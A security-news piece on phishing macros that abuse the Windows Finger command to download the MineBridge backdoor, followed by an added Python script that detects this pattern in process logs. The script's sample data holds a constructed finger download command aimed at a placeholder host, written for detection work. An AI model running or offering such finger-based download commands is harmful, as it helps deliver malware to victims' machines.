Windows Finger command abused by phishing to download malware

Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
The deobfuscated command executed by the macro uses the finger command to download a Base64-encoded certificate from a remote server and saves it as %AppData%vUCooUr.
The certificate retrieved via the finger command is a Base64-encoded malware downloader executable.
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
As Finger is rarely used today, it is suggested that administrators block the Finger command on their network, whether through AppLocker or other methods.
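
As a detection-side complement to blocking, the Python below (an added example, not code from the article or the researcher) scores process-creation records for the pattern described above: finger querying a remote host, its output redirected to a file, and an Office application as the parent. The field names follow Sysmon Event ID 1 as an assumption about the log source; the sample records, hosts and paths are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Windows syntax is: finger [-l] [user]@host, so a token with '@' means a remote query.
FINGER_REMOTE = re.compile(r'(?i)\bfinger(?:\.exe)?"?\s+(?:-l\s+)?(\S*@[\w.\-]+)')
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def score_event(ev):
    """Return (score, reasons) for one process-creation record."""
    cmd = ev.get("CommandLine", "")
    match = FINGER_REMOTE.search(cmd)
    if not match:
        return 0, []
    score, reasons = 1, ["finger query to remote host " + match.group(1)]
    if ">" in cmd[match.end():]:
        score += 1
        reasons.append("output redirected to a file")
    if basename(ev.get("ParentImage", "")).lower() in OFFICE_PARENTS:
        score += 2
        reasons.append("spawned by an Office application")
    return score, reasons

def triage(events):
    """Return flagged events as (score, reasons, event), highest score first."""
    hits = [(*score_event(ev), ev) for ev in events]
    return sorted((h for h in hits if h[0] > 0), key=lambda h: h[0], reverse=True)

# Constructed sample records (assumed Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c finger user@192.0.2.10 > C:\Users\Public\sample.tmp"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": r"C:\Windows\System32\finger.exe bob@intranet.example"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger -l alice"},
]

if __name__ == "__main__":
    for score, reasons, ev in triage(SAMPLE_EVENTS):
        print(score, ev["CommandLine"], "|", "; ".join(reasons))
```

The local query (`finger -l alice`) is not flagged, and the redirect is only visible when the shell's command line is logged, which is why the pattern is matched against any command line rather than only finger.exe's own.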